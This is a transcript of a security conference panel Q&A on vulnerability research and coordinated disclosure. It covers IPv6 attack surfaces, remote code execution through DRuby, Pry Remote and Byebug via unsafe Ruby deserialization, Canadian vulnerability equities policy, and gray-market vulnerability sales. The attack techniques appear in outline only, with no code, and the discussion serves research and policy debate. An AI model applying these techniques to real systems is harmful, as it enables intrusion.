 Hey, thanks again. And welcome back to our Q&A session. And hello, Addison. Thanks for joining us. So we had this absolutely awesome track on vulnerability research. And we have more or less everyone here with us. Iwan had to leave for another meeting. I guess we are all accustomed to this now. So for my first question, I was very much interested to taking up a few of the questions that came up through the slide. So thinking of our first speaker, so Pedro, this one is for you before I get to troll about IPv6. So someone asked, how does OpenWRT or slash PF Sense stack up to the closed source models that are being used? Okay, that's a pretty good question. Personally, when I buy a router, I always look for one that supports OpenWRT or DDWRT, PF Sense I haven't used. They're kind of all the same. But to be honest, I never really audited OpenWRT or DDWRT myself, but I have audited routers that use OpenWRT as a base. So some manufacturers, they take OpenWRT and then they extend it. And the base is pretty secure. Usually when we find a router with OpenWRT, its base is pretty secure. So we look for the vendor specific information. So yeah, I'd recommend, I'd say that the OpenWRT, DDWRT code is much better than almost every consumer router vendor code. But again, with the caveat that I haven't really audited myself. But I use it, so yeah. Yeah, thanks, sorry I was muted. Thanks for this one. I have, like as I said, but this may be something also if it's a can jump on. To my knowledge, there is little expertise on, I don't know, say IPv6 bucket filtering. So considering your expertise on either protocol or equipment, can you tell us a bit about, some kind of forecasting of sorts? Can you elaborate on specific vulnerabilities that we can expect in the coming years on protocols and the equipments that we'll need to handle them, that we are not so much versed into, that we don't have so much expertise into? So they're common, there are a few already around. So one of them is recently, the fact that IPv6 interprets some strings, some strings that look like URLs interprets them as addresses. So if I'm not mistaken, this was used recently in an exploit. I can't remember exactly, but I'm sure it's easy to find on Google. So that's one example. Another example is, for example, IPv6 auto configuration. So this, while it tries to reduce complexity, it also introduces an unexpected attack vector, right? So if a vendor thinks of, vendors typically have a lot more experience with IPv4 as we do, right? So they typically see IPv6 as an add-on and they tend to forget the existence of slack auto configuration and these kind of things. So this might open up new avenues for exploitation. And then also we have these firewall bypasses. It can be as simple as, you have a service listening on all ports. It also binds to IPv6 and you forget to firewall on IPv6. So it can be a simple mistake, you know? And I think finally the last part would be the attacking the implementation itself. Whereas I guess most devices will use Linux. So, you know, it's kind of more secure. So to speak, more eyes are on it. Some vendors, they have their own IP protocol implementations. So they're all internet protocol implementations and there I'm sure it'll be a lot of bugs in this custom one. Yeah, my guess is, but the number of bugs is not gonna decrease anytime soon. Still, since we are still on a protocol topic, can you, like, would you like to jump on that question right now? Yeah, with pleasure. Let me share one little and innocent story that I had recently. I was playing around with Windows 2019 and 2016. So I realized they have IPv6 stack enabled by default and Microsoft recommends not to disable it. But I was actually investigating something around re-routing stuff, injecting routes. And what I discovered is you can pretty quickly develop mechanics or the code that will inject router advertisements or routing info into the IPv6 stack of any Windows server. So first, you know, I was like surprised, why or how can you do that? But then when I thought a little bit more about it, I concluded it's actually a legitimate functionality. This is something that exists even in the IPv4 stack world where you have these ICMP redirects and things that most of the environments today will forbid. However, very similar thing existed in the IPv6. So I wasn't actually quite sure how to interpret that result. So I contacted Microsoft, I explained them, you know, how the whole thing went. And actually it was aligned with my expectations because they said that's not a bug, that's not a security flow, that's legitimate functionality. And I fully agree with that. The only thing that I thought of, why would you leave that by default? Why would Windows servers need to have IPv6, anything enabled by default? You know, any kind of routing engine. So that's the thing that remained kind of open. And yes, to answer your question, IPv6 is coming big way. I think the probably biggest security issue for now is that we don't know, we don't know much about that protocol because it's not so widespread. We surely know how to use IPs and assign them, but what are the security intricacies of it? I don't know, it remains to be seen in the coming years, I guess, and decades, I believe. Yeah, we need some more foresight on emerging, not just technologies, but also threats for existing technologies. I'll get back to you in a minute. I want to just to give the opportunity to Florian and Stephanie to tell us whether they're aware of any recent cases of Canadian security researchers being prosecuted under the criminal code due to their research. Like in other words, have stuff gone wrong for someone who, in good intentions, has tried to disclose vulnerability. I'll hand that off to Florian, who is the legal expert here. Yes, and I would add this to you, and I said we had to leave because she's exactly doing her LLM thesis on this topic. And this kind of a gray area, we know of some cases, and there is like case law, like decisions, not using those provisions, but very few, at least publicly available, and often in those cases, people have like gag order, et cetera, so it's very complex to know exactly how it was used. So we heard of many cases. That's why we started that research project to try to better define the framework and maybe call for law reforms to better protect defensive, hacking, intuitions, and vulnerability disclosures, et cetera. And that's also like with that framework that Stephanie and you are now working on the report. Thanks, and another question that came up is whether you have heard of the communication security establishments, equities management framework. And if yes, what do you think about it? Because I think your discussion was on another entity's equities approach to reuse the U.S. term. Over to you. Well, yes, so during our presentation, we did mention the CDC's equities framework, their process, and we have heard of the framework. It has been available since March 2019, but it is really, really short and opaque. I have several critiques of it, and one is that only parties of the CDC are involved in the process. So unlike the U.S.'s Vulnerabilities Equities Program, which they call the VEP, their program has a range of people from different departments who represent the agency views. While as in the CDC's framework, it's just CDC members who are deciding whether or not to disclose or hide vulnerabilities. Also, the framework is really short. The U.S.'s Unclassified VEP is super thorough. The CDC's doesn't offer information like what's in scope of their framework, the exceptions, thorough detailing of the responsibilities of the actors involved, things like that. And the last critique I have is a small critique because you could argue that what the U.S. has is symbolic in the sense that their VEP has one transparency mechanism, which is annual reporting, which at the very least provides some information on the yearly activities done under the VEP procedure. And the CDC doesn't have anything like that. It's a very short document, not comprehensive, and it's still just leaving us with more questions than it is. Yeah, that's a... Don't get me started. And if I may add also... Go ahead. Maybe the new framework, like, well, framework with quotes, that short document doesn't provide us with some, you know, guarantees, some safety goals for safety researchers to be sure that if they go forward and return to the government to help out, it's going to help out like society and not the government. And not the government's against society. And there's some conversation right now in the national security and angels community as part of the reviews of the agencies practices with NCR, which is like the watchdog of the national security agencies in Canada to look into those kind of practices and making sure that they build trust with the research, security research community to work together. And so that researchers can, yeah, can believe that the government will like support this and not use their research to hack citizens. Yeah, I mean, it's coordinate vulnerability disclosure and the vulnerability research that we are all doing one way or another is all about protecting users because at some point, me and you, we are everyone's, you know, someone's end user at some point. So, but we'll, we'll get back to this in a minute. I wanted to reach out to Jeff and Addison like, okay, I'm Ruby noob extraordinaire. You know, that's incandestible, but still I'm not sure like the framework you were presenting tonight is a very well known one. So I got curious, how did you guys come up to work? Like, what's the backstory? How did you come up to work on that? So as we kind of walk through the story quickly at the beginning of the talk and basically there was this Java instrumentation thing that I was building and to kind of implement instrumentation hooks and make it kind of quick and simple. The hooks were implemented in JRuby. So they, they could, you could script them up on the fly be loaded, you didn't need to compile things. And we got it working with a live REPL. So you could essentially just inject the REPL into a Java process and kind of poke around from there with standard like reflection-esque, you know, navigation. And the REPL was this thing called Pry Remote. Pry is kind of the high-end REPL for Ruby that is better than IRB, the default one. And Pry Remote did all of this forwarding of the calls from this separate system of the device with this DRuby stuff. And the moment we started looking at it, it was really crazy because we were trying to make it so that among other things like the traffic was locked down it couldn't be messed with. And meanwhile, we have this thing that is plain text. You can just connect to a server from anywhere. If it's exposed, you can send the commands. We'll start looking at this and like, there's no way we can release this thing while this is so exploitable. And then went on from there. And essentially, Pry Remote is from what I can understand is essentially used as a sort of debugging aid, drop-down debugging, especially when you're debugging some Ruby stuff running in like a Rails app or whatever on a remote server. And you want to just drop to a shell and poke around and see what's going on with the variable state, things like that. It's different. Bybug is the kind of debuggery thing that everyone uses for Ruby. And itself has a wacky just text-based protocol like plain texts over the network. And I've seen some interesting things from like, we're dealing with some auditing or some stuff a while back. And there was an arbitrary send that could be issued from some endpoint in an app. And we couldn't really control the arguments too well. But we're able to reach Bybug, which caused it to just start listening on a port on the server. We then connected to that and had it run arbitrary Ruby to compromise the system. And so that was an interesting POC. But all of these kinds of debugging aids essentially seem to have very just simplistic networking going on like protocol stuff and little possibly in the thought of security around them. Ruby can sort of wrap TLS, although all the variable things don't call it SSL, which gives you a hint at kind of how to maintain that is. But some of the things we didn't get into in talk are that there's a technically a system for access controls and saying which hosts can talk to what. But because you can smuggle those proxy objects into things, if you can trick one node in a distributed group to talking with you. If you couldn't get code execution for whatever reason, you could still potentially smuggle it an object that references another one of the hosts in the network that allows it to talk with that thing that you're not allowed to talk to. And you can essentially crawl up the map of the whole thing, the graph of it from node to node that way. And it gets a little wacky. Yeah, that sounds very interesting. I'm trying to behave here. But at some point you had to talk to, well, the people who wrote this, whatever, are right. So I mean, we are in a vulnerability research and disclosure and management track, right? So I sort of have to come to ask this question. So what happened there? How did it go? So the interesting thing, right, is that the Ruby documentation says it's insecure and not too exposed to untrusted things, which is often how things work for arbitrary deserialization. It's like, don't talk, don't do Java deserialization unless you trust the data coming in and it's like, can you ever trust the data that's coming in? So we reached out to them effectively with kind of this information on the fact that, well, actually, because of all these other things, the clients are also exploitable. And they kind of took that information and sort of disappeared with it. And unfortunately, like the most that we might get, because the protocol is kind of set in stone, as it is. And functionally, I don't think it can really change because of the backwards compatibility it strives for. But what we were looking to see come out of it was that the documentation would be updated to kind of reflect the additional dangers of using this. And I don't think that ended up happening. But again, it's kind of been known to be completely insecure. Like they themselves say, this is dangerous. Don't talk this protocol with things that you do not trust, but not necessarily in the right way that would give the proper warning. And so given all the other things, essentially the protocol is known to be insecure and vulnerable for a whole bunch of things. And so we didn't treat it directly as having exploits on it because a lot of this was mostly exploitation techniques of known problems to a certain degree and kind of exercising all the things related to the protocol itself. But for Metasploit, on the other hand, users of this thing who did not expect to be using it or have that problem, we reached out directly as, this is a vulnerability you need to deal with us because it is what it is as the API that it is. No one really is going to son or network or saying, hey, you need to yank this entire Java deserialization thing from the Java language. You just can't be allowed to exist. But you go to every single person who does deserialization and you say, hey, you're exposing this, you need to kind of stop doing that. And then alternatively, people also will go to the libraries and have the gadgets and say, hey, you need to fix your gadget so it isn't exploitable. But really the problem is the deserialization in the first place and not the gadget. Though in a couple of instances, it seems like there have been a couple of universal Ruby gadgets, especially built into core Ruby standard library. I've tried to find a couple. I've gotten close now and then and other people have always found these really amazing ones. And there is one in fact that we're using as part of our fully kind of weaponized CLI script thing. But who knows if they'll patch something in a minor version update and break it. So that's why like when targeting the older version of the Metasplit payload, we still use the active record serialization thing because it's just completely reliable effectively. There have been some changes between super old versions of Rails and I actually once had to rework that payload to target I want to say Rails two or three that was still in existence somewhere because the existing payload, the class structure had actually changed. And so like at some point in the middle of the nested objects something that was a class became a module or as a module became a class. And so the default payload didn't work and I had to rewrite the way that the gadget was created. It was in fact, we still the same gadget. I just had to restructure it. So my personal take is the gadgets are not the problem. It's the deserialization, unsafe deserialization that can control its own destiny effectively by saying I am a foo object. Like no, you should not be able to say you're a foo object containing a bar, a baz or whatever object inside of you. You are what I should tell you to deserialize as which is kind of how Protobufs works. It's how JSON does JSON to whatever in Java. Those are safe. Everything that has magic that can control what it deserializes as is fundamentally broken as an archetype. Yeah, I think we are set here for a huge structural thing, you know. But so Florian had to leave for another meeting because I guess on your side, guys, it's still day. So I have a question to Ivica because I was very much mulling over this when you were basically concluding your talk earlier. So you kind of, you're publishing the proof of concepts of what you presented. And I was wondering, like, what is the risk model or the threat model, if you like, of this publication? Like, you know, it's always a question of how much am I providing something to be studied, examined and whatnot by anyone in the community and how much can this thing be more or less readily used by, well, not very well-intentioned people. And if they could use it, like, can you elaborate a little on the cost-benefits ratio for a potential attacker that will basically praise on your proof of concept? Thanks. So the existing payloads to, like, compromise any general... It was the question, sorry. The question was for Ivica. No, no, don't worry. Don't worry. Okay, so there's one thing I would say that distinguishes my presentation from the other guys. The other guys are very sophisticated. They really found vulnerabilities in the products. But in my case, I actually, you know, I did not find any buffer overflow, any irregularities in input processing, in folder traversal or whatever. I'm actually using completely legitimate behavior of the protocol as described by RFC. The only thing that I did is I changed the attributes that say this is A to say this is B, whereas both A and B are legitimate. So in a sense, this exploit is actually not an exploit. It's just, you know, playing within the boundaries that define legitimate protocol. So in that sense, yeah, sure enough, it can be abused because obviously the intention where you, you know, impersonate or spoof the device, and especially if this can be proven that was done for malicious purpose is, you know, a bad thing. And yes, there is always a risk of making exploits or making, you know, write-ups about certain vulnerability public. But then it's, you know, kind of chicken egg dilemma. If we don't expose that stuff, you know, vendors might never be enticed to actually fix them. On the other hand, yes, exposing them obviously, you know, presents the risk that the malicious actor will misuse that and attack, you know, other parties. So it's like everything, you know, it's like the scientists who invented, well, who realized and understood how to split the atom. And once when they saw the Hiroshima and Nagasaki demonstration of power, you know, they said like, oh, I regret that I ever did that. But it's, I guess, in human nature, to actually use and abuse whatever comes out in any science. So I guess it's a kind of inherent problem of the way how people perceive, you know, the opportunities to either do some harm or promote themselves or help the society. And it's not up to, well, you cannot say that any technology is good or bad. It's only as good or as bad as people intend to use it. So, you know, it's difficult. I guess moral or ethics behind using these tools is what determines your action and the consequences. Sure. You know, I mean, it's a very delicate balance to strike and I've been kind of trying to play the devil's advocate here because this is basically, and this gets me to my second and concluding question that is to all of you. This is the kind of, you know, counter argument that we hear when trying to promote, well, wider publication of security research, more transparency from, you know, from the vendor side, from government side and, you know, the whole VEP discussion that we just had earlier and also, you know, trying to promote more community-based, well, improvement of technology, technology that we all use. So my concluding question to you would be, as we have this very interesting and rich set of skills and points of view here, like, would it be your kind of crossed recommendations from technology people to policy people and from policy people to technology people? Like, for example, something that didn't come up earlier but that we all do at some point is reverse-engineer something. You know, it's go beyond what is just visible. Like, if you have an app, yeah, you can always do a static analysis that brings you just zero knowledge or close to zero, like, very little. So if I decided to go further and I don't know, reverse whatever Java app, mobile app I have there, but because I'm well-intentioned and I think this is the only way for me to identify any potential vulnerabilities there, stuff that can cause harm. And then I go and I report, you know, I disclose this vulnerability because I'm a candid person and well-meaning person. So, okay, from a technical side of view, I need to do this. And I like it. From a policy point of view, I don't know how it's in Canada, but for example, in Europe, you can do reverse engineering like you want to. It's only accepted in very specific cases and just, yeah, okay, we are on the record, but off the record, there are many of us trying to change that state of school. But, you know, that's the kind of things like, what would be your recommendations from technical people to policy people and from policy people to technical people on, you know, how can we move forward as a community and as a society, you know, using technology that is no longer a privilege to make technology at least less vulnerable, I would say more secure, but actually less vulnerable. And, you know, make people more responsible for the vulnerabilities that they do or do not fix. Over to you, Addison, perhaps. We didn't hear you, so if you want to take this one first. I think something interesting to point out is from the point of view of a penetration tester as someone who finds vulnerabilities in systems, there's a very clear sort of trade-off that you make where either you disclose the vulnerability to the parties affected or you sell the vulnerability. And I think that the selling of the vulnerability is something that's often overlooked, especially by the people who make policy decisions, but the selling of the vulnerability is something that is very easy to do. The people who buy vulnerabilities make it as easy as possible. And as someone who finds vulnerabilities, you're doing a public service by disclosing it to the people who actually write the software from the people who actually use the libraries that you find a vulnerability in. And that's something that as someone who finds vulnerabilities, I want the world to be a better place. So I tell the people who write the software, hey, you have a bug here. Hopefully you also agree that it is a bug. And hopefully you see the need to fix it. And sometimes you get pushed back and depending on how strongly you feel your moral beliefs, you will argue that. But really, you're fighting against this system that there is another side to this. And this other side will pay you very generously to buy these vulnerabilities and not disclose them to the people who write the software. And I think this sort of from a policy side, it's very easy to not sort of look at this. And it's very easy to say like, oh, because very often from a policy side, as soon as you know about the vulnerability, you're now liable for it. And legally this puts you in very hot water and this puts you in some sort of situation that you don't want to be in. And having random people on the internet show up and tell you about vulnerabilities that are in your systems is not something you want to happen ever. And I feel like this is sort of a very difficult situation that we're in as far as the internet goes and society goes and finding some sort of solution to this problem where people like me who find vulnerabilities in systems can go up to people in a, I don't know, a security role at some large corporation and me being able to tell them about a vulnerability without them taking it as a threat in any way and being able to take it as some sort of help that I'm intending to help them, free help. And a lot of times it's assumed that it's some sort of offensive attack on their systems and it puts me in sort of like a difficult situation and maybe it's easier for me to sell that vulnerability. And that's sort of the thing that as a society we need to stop. We need to stop making it so beneficial for people like me to sell these vulnerabilities and make it more beneficial for me to provide those vulnerabilities to people who are in the power to fix them. Yeah, just for what it is worth I participate in different policy work groups at the international level and that question about how do we drive the gray market for vulnerability is on the table. It's just not the same timeline in policy as it is in technology, so bear with us as we try to come up with something. Yeah, I think it's... I mean, you know, because there have been discussions about oh, let's ask governments to be the recipients of those vulnerabilities to try to counteract the gray market and you're like, yeah, I'm not sure many people will be happy with governments not communicating anything but hoarding vulnerabilities. So, you know, it's... Yeah, the timeline is not the same but who else want to pick this? Yeah, Stephanie, go ahead. What recommendations to the tech people do you have? Well, definitely to avoid these vulnerabilities from going into the illicit markets it's about incentivizing good behavior and I think a huge part of that is having the policymakers setting the rules of the game so that the security researchers when they have a vulnerability they know the type of activities that are allowed so a lot of coordinate vulnerability disclosure policies they let you know the scope of activities are allowed so like they'll say pen testing is not allowed or if you see personal information well, you know, don't delve into it too much doing things like that to set the rules to the game everyone is confident in what they're doing and that security researchers trust that when they are disclosing a vulnerability that they're not putting themselves into trouble they're not facing, you know, legal liabilities for doing that and yeah, at the end of the day making sure that these relationships are fostered because security researchers do want to help and there are ways to try to, you know make sure that these vulnerabilities aren't going to be exploited and used for bad practices Sure, Petra, I'm seeing your t-shirt You want to jump in? Because I remember the time when we called CVD responsible disclosure and then everyone got worked up as to who is responsible for what so we tried to change the name, right? Yeah, I mean, so I agree with everything that has been said, however, there are some very big problems So the first one is with regards to incentives Okay, so assume I am a moral I am a hacker, I have skills I find a vulnerability in whatever Why should I report to the manufacturer when they're going to give me a headache they're not going to give me anything except trouble when I can go to the gray market and get money for it, completely anonymously Also Reine, you said that in Europe it is illegal to do reverse engineering I don't live in Europe anymore but I lived for many years I published many vulnerabilities no one ever came to me so basically there is no enforcement whatsoever of this law unless you piss off the wrong company and they go after you but you know, that's even for a company with a lot of lawyer money it's quite hard to do I think that the big problem here is really a question of incentives you have to incentivize people to go to you I'll give you an example from my talk regarding consumer auto vulnerabilities I can't remember the exact numbers but I think if you go on the net gear they have a bug bounty and they offer 10,000 for remote code execution vulnerability in the black market, in the gray market not even the black, in the gray market so they never pay the top 10k they always pay less, they always find an excuse to pay less and we're talking about a multi hundreds of million dollar company maybe billion, I think they're over a billion in revenue and they're paying peanuts you pay peanuts, you get monkeys simple as that so there's this incentive side and then from the policy side I think trying to control this kind of thing is really sticking your finger in the dam you know, like I say you can put all the rules you want in policy but I don't care I don't care because I take all your rules I throw them out of the window I do my research, I sell in the gray market what are you going to do so you can't really of course you have to have some rules but they cannot be restricted they have to be to kind of give you a legal framework and that's with the proper incentives specifically financial incentives you know is the only way to control the problem because otherwise it's like you know, it's like for example how do you control is very much in the news now cryptocurrency you know, you have to shut down the internet right, there's no way to control cryptocurrency except if you try to shut down the internet and it's the same thing with vulnerability research in a completely different way it's happening everywhere underground and you cannot try to control it you have to try to mold it into the way you want so as much as I would like to continue the discussion I think there are other tracks coming after us but yeah, please feel free to continue the discussion over at Discord sorry if I had missed giving the word to the floor to someone and in any event this has been absolutely great I've learned so much including much more than I have ever suspected on D Ruby so thanks again stay safe and I'm very much hoping we can meet someday in person when stuff settles down thank you so much have a good day or evening bye